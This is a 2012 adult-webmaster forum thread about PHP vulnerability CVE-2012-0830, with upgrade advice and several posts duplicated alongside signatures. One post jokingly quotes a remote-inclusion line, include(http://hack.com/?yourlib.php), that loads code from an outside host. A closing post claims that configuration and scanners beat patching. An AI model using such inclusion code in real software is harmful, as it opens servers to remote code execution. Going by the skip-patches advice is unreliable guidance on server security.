Critical vulnerability identified in PHP - GoFuckYourself.com

MrGusMuller · 02-04-2012, 03:31 AM

Quote:

A critical vulnerability in the most recent release of PHP has just been found (CVE-2012-0830). This exploit could allow arbitrary code to be remotely executed on a PHP system. This vulnerability is present both on PHP 5.3.9, and on PHP 5.2.17 that contains a backported fix for CVE-2011-4885.

in Zend Server Update Email

https://bugzilla.redhat.com/show_bug.cgi?id=786686
http://thexploit.com/sec/critical-ph...collision-dos/

You all should update to the PHP 5.3.10.

raymor · 02-04-2012, 03:52 AM

Thanks. Of course PHP itself is a arbitrary code execution vulnerability. include(http://hack.com/?yourlib.php) anyone?

Klen · 02-04-2012, 06:44 AM

I cant update to 5.3,it's too different to ver 5.2.Any fix for version 5.2 ?

fris · 02-04-2012, 06:46 AM

Quote:

Originally Posted by KlenTelaris

I cant update to 5.3,it's too different to ver 5.2.Any fix for version 5.2 ?

im pretty sure it only effects 5.3.x

Fletch XXX · 02-04-2012, 06:46 AM

thanks for posting.

DamageX · 02-04-2012, 06:58 AM

Quote:

Originally Posted by fris

im pretty sure it only effects 5.3.x

Quote:

This vulnerability is present both on PHP 5.3.9, and on PHP 5.2.17 that contains a backported fix for CVE-2011-4885.

Looks like it does affect at least one version of 5.2.x

fris · 02-04-2012, 07:33 AM

oh snap time to upgrade then

fris · 02-04-2012, 12:43 PM

just finished my upgrade

Quote:

PHP 5.3.10 with Suhosin-Patch (cli) (built: Feb 4 2012 06:50:45)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
with the ionCube PHP Loader v4.0.12, Copyright (c) 2002-2011, by ionCube Ltd

LiveDose · 02-04-2012, 03:53 PM

Bump. Thanks.

MrGusMuller · 02-07-2012, 05:05 AM

For those with CPanel...
EasyApache 3.8.6 is now available; in this build PHP 5.3.10 replaces 5.3.9.
The change log is available here: http://docs.cpanel.net/twiki/bin/vie...syApache#3.8.6

seeandsee · 02-07-2012, 05:34 AM

Fucking vulnerability holes, is there some super protected coding to work with...

Klen · 02-07-2012, 06:36 AM

But still question is will it fuck up some scripts if i do update....

Operator · 02-07-2012, 06:40 AM

Php 5.1.6

6South · 02-07-2012, 06:41 AM

PHP is a risk no matter what version you upgrade to and installing the latest, greatest build of PHP is almost guaranteed to break at least one of your apps.

As usual, this type of vulnerability can be protected against without constant upgrading by simply managing your PHP configuration and responsible administration / monitoring of your servers.

Suhosin, responsible PHP settings, active protection (mod_security) and a decent malware / exploit scanner will serve you much better than trying to keep up with the patches. For every published exploit there's at least a dozen others out there at any given time.

02-04-2012, 03:52 AM	#2
raymor Confirmed User Join Date: Oct 2002 Posts: 3,745	Thanks. Of course PHP itself is a arbitrary code execution vulnerability. include(http://hack.com/?yourlib.php) anyone? __________________ For historical display only. This information is not current: support@bettercgi.com ICQ 7208627 Strongbox - The next generation in site security Throttlebox - The next generation in bandwidth control Clonebox - Backup and disaster recovery on steroids

02-04-2012, 06:46 AM	#5
Fletch XXX GFY HALL OF FAME DAMMIT!!! Join Date: Jan 2002 Location: that 504 Posts: 60,840	thanks for posting. __________________ Want an Android App for your tube, membership, or free site? Need banners or promo material? Hit us up (ICQ Fletch: 148841377) or email me fletchxxx at gmail.com - recent work - About me

02-04-2012, 07:33 AM	#7
fris Too lazy to set a custom title Industry Role: Join Date: Aug 2002 Posts: 55,372	oh snap time to upgrade then __________________ Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence. WP Stuff

02-04-2012, 03:53 PM	#9
LiveDose Show Yer Tits! Industry Role: Join Date: Feb 2002 Location: Somewhere Out there... Posts: 25,792	Bump. Thanks. __________________ Scammer Alert: acer19 acer [email protected] [email protected] Money stolen using PayPal

02-07-2012, 05:05 AM	#10
MrGusMuller Confirmed User Industry Role: Join Date: Oct 2010 Location: Portugal Posts: 1,262	For those with CPanel... EasyApache 3.8.6 is now available; in this build PHP 5.3.10 replaces 5.3.9. The change log is available here: http://docs.cpanel.net/twiki/bin/vie...syApache#3.8.6 __________________ StagCMS - Adult CMS - user friendly adult content management system - speed up your websites with no SQL connections ICQ: 632343*113

02-04-2012, 06:44 AM	#3
Klen Industry Role: Join Date: Aug 2006 Location: Little Vienna Posts: 32,235	I cant update to 5.3,it's too different to ver 5.2.Any fix for version 5.2 ?

02-07-2012, 05:34 AM	#11
seeandsee Check SIG! Industry Role: Join Date: Mar 2006 Location: Europe (Skype: gojkoas) Posts: 50,945	Fucking vulnerability holes, is there some super protected coding to work with... __________________ BUY MY SIG - 50$/Year Contact here

02-07-2012, 06:36 AM	#12
Klen Industry Role: Join Date: Aug 2006 Location: Little Vienna Posts: 32,235	But still question is will it fuck up some scripts if i do update....

02-07-2012, 06:40 AM	#13
Operator So Fucking Banned Industry Role: Join Date: May 2009 Location: ΠπΠ Posts: 2,419	Php 5.1.6

02-07-2012, 06:41 AM	#14
6South Registered User Industry Role: Join Date: Jan 2011 Posts: 84	PHP is a risk no matter what version you upgrade to and installing the latest, greatest build of PHP is almost guaranteed to break at least one of your apps. As usual, this type of vulnerability can be protected against without constant upgrading by simply managing your PHP configuration and responsible administration / monitoring of your servers. Suhosin, responsible PHP settings, active protection (mod_security) and a decent malware / exploit scanner will serve you much better than trying to keep up with the patches. For every published exploit there's at least a dozen others out there at any given time.